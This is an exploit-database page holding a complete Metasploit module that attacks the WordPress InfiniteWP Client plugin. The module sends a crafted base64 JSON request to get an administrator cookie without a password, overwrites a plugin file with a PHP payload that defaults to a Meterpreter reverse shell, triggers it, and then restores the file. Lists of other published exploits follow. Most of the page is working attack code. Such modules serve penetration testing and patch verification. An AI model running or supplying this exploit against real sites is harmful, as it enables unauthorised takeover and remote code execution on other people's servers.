Menu

Search for hundreds of thousands of exploits

"WordPress InfiniteWP - Client Authentication Bypass (Metasploit)"

Author

Exploit author

Metasploit

Platform

Exploit platform

php

Release date

Exploit published date

2020-02-11

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ManualRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress InfiniteWP Client Authentication Bypass',
      'Description'    => %q{
        This module exploits an authentication bypass in the WordPress
        InfiniteWP Client plugin to log in as an administrator and execute
        arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.

        The module will attempt to retrieve the original PLUGIN_FILE contents
        and restore them after payload execution. If VerifyContents is set,
        which is the default setting, the module will check to see if the
        restored contents match the original.

        Note that a valid administrator username is required for this module.

        WordPress >= 4.9 is currently not supported due to a breaking WordPress
        API change. Tested against 4.8.3.
      },
      'Author'         => [
        'WebARX', # Discovery
        'wvu'     # Module
      ],
      'References'     => [
        ['WPVDB', '10011'],
        ['URL', 'https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/'],
        ['URL', 'https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/'],
        ['URL', 'https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html']
      ],
      'DisclosureDate' => '2020-01-14',
      'License'        => MSF_LICENSE,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Privileged'     => false,
      'Targets'        => [['InfiniteWP Client < 1.9.4.5', {}]],
      'DefaultTarget'  => 0,
      'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/reverse_tcp'}
    ))

    register_options([
      OptString.new('USERNAME',    [true, 'WordPress username', 'admin']),
      OptString.new('PLUGIN_FILE', [true, 'Plugin file to edit', 'index.php'])
    ])

    register_advanced_options([
      OptBool.new('VerifyContents', [false, 'Verify file contents', true])
    ])
  end

  def username
    datastore['USERNAME']
  end

  def plugin_file
    datastore['PLUGIN_FILE']
  end

  def plugin_uri
    normalize_uri(wordpress_url_plugins, plugin_file)
  end

  def check
    unless wordpress_and_online?
      return CheckCode::Unknown('Is the site online and running WordPress?')
    end

    unless (version = wordpress_version)
      return CheckCode::Unknown('Could not detect WordPress version')
    end

    if Gem::Version.new(version) >= Gem::Version.new('4.9')
      return CheckCode::Safe("WordPress #{version} is an unsupported target")
    end

    vprint_good("WordPress #{version} is a supported target")

    check_version_from_custom_file(
      normalize_uri(wordpress_url_plugins, '/iwp-client/readme.txt'),
      /^= ([\d.]+)/,
      '1.9.4.5'
    )
  end

  # https://plugins.trac.wordpress.org/browser/iwp-client/tags/1.9.4.4/init.php
  def auth_bypass
    json = {
      'iwp_action' => %w[add_site readd_site].sample,
      'params'     => {'username' => username}
    }.to_json

    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => wordpress_url_backend,
      'data'   => "_IWP_JSON_PREFIX_#{Rex::Text.encode_base64(json)}"
    )

    unless res && res.code == 200 && !(cookie = res.get_cookies).empty?
      fail_with(Failure::NoAccess, "Could not obtain cookie for #{username}")
    end

    print_good("Successfully obtained cookie for #{username}")
    vprint_status("Cookie: #{cookie}")

    cookie
  end

  def exploit
    # NOTE: Automatic check is implemented by the AutoCheck mixin
    super

    print_status("Bypassing auth for #{username} at #{full_uri}")
    unless (@cookie = auth_bypass).include?('wordpress_logged_in')
      fail_with(Failure::NoAccess, "Could not log in as #{username}")
    end

    print_good("Successfully logged in as #{username}")
    write_and_exec_payload
  end

  def write_and_exec_payload
    print_status("Retrieving original contents of #{plugin_uri}")
    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)

    unless contents
      fail_with(Failure::UnexpectedReply, "Could not retrieve #{plugin_uri}")
    end

    print_good("Successfully retrieved original contents of #{plugin_uri}")
    vprint_status('Contents:')
    print(contents)

    print_status("Overwriting #{plugin_uri} with payload")
    unless wordpress_edit_plugin(plugin_file, payload.encoded, @cookie)
      fail_with(Failure::UnexpectedReply, "Could not overwrite #{plugin_uri}")
    end

    print_good("Successfully overwrote #{plugin_uri} with payload")

    print_status("Requesting payload at #{plugin_uri}")
    send_request_cgi({
      'method' => 'GET',
      'uri'    => plugin_uri
    }, 0)

    restore_contents(contents)
  end

  def restore_contents(og_contents)
    print_status("Restoring original contents of #{plugin_uri}")
    unless wordpress_edit_plugin(plugin_file, og_contents, @cookie)
      fail_with(Failure::UnexpectedReply, "Could not restore #{plugin_uri}")
    end

    return unless datastore['VerifyContents']

    contents = wordpress_helper_get_plugin_file_contents(@cookie, plugin_file)

    unless contents == og_contents
      fail_with(Failure::UnexpectedReply,
                "Current contents of #{plugin_uri} DO NOT match original!")
    end

    print_good("Current contents of #{plugin_uri} match original!")
  end

end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-05-25 "Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)" remote windows Metasploit
2020-05-25 "Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)" remote hardware Metasploit
2020-05-22 "WebLogic Server - Deserialization RCE - BadAttributeValueExpException (Metasploit)" remote multiple Metasploit
2020-05-19 "Pi-Hole - heisenbergCompensator Blocklist OS Command Execution (Metasploit)" remote php Metasploit
2020-05-01 "Apache Shiro 1.2.4 - Cookie RememberME Deserial RCE (Metasploit)" remote multiple Metasploit
2020-04-28 "Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)" local windows Metasploit
2020-04-20 "Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)" remote linux Metasploit
2020-04-17 "Nexus Repository Manager - Java EL Injection RCE (Metasploit)" remote linux Metasploit
2020-04-16 "Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)" remote linux Metasploit
2020-04-16 "VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)" local macos Metasploit
2020-04-16 "TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)" remote linux_mips Metasploit
2020-04-16 "Apache Solr - Remote Code Execution via Velocity Template (Metasploit)" remote multiple Metasploit
2020-04-16 "Liferay Portal - Java Unmarshalling via JSONWS RCE (Metasploit)" remote java Metasploit
2020-04-16 "DotNetNuke - Cookie Deserialization Remote Code Execution (Metasploit)" remote windows Metasploit
2020-04-16 "PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)" remote php Metasploit
2020-04-16 "ThinkPHP - Multiple PHP Injection RCEs (Metasploit)" remote linux Metasploit
2020-03-31 "SharePoint Workflows - XOML Injection (Metasploit)" remote windows Metasploit
2020-03-31 "Redis - Replication Code Execution (Metasploit)" remote linux Metasploit
2020-03-31 "IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)" remote multiple Metasploit
2020-03-31 "DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)" remote hardware Metasploit
2020-03-17 "Rconfig 3.x - Chained Remote Code Execution (Metasploit)" remote linux Metasploit
2020-03-17 "ManageEngine Desktop Central - Java Deserialization (Metasploit)" remote multiple Metasploit
2020-03-10 "PHPStudy - Backdoor Remote Code execution (Metasploit)" remote php Metasploit
2020-03-10 "Nagios XI - Authenticated Remote Command Execution (Metasploit)" remote linux Metasploit
2020-03-09 "Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)" remote windows Metasploit
2020-03-09 "Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)" remote multiple Metasploit
2020-03-09 "Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)" remote multiple Metasploit
2020-03-09 "Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)" remote multiple Metasploit
2020-03-09 "PHP-FPM - Underflow Remote Code Execution (Metasploit)" remote php Metasploit
2020-03-09 "OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)" local linux Metasploit
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.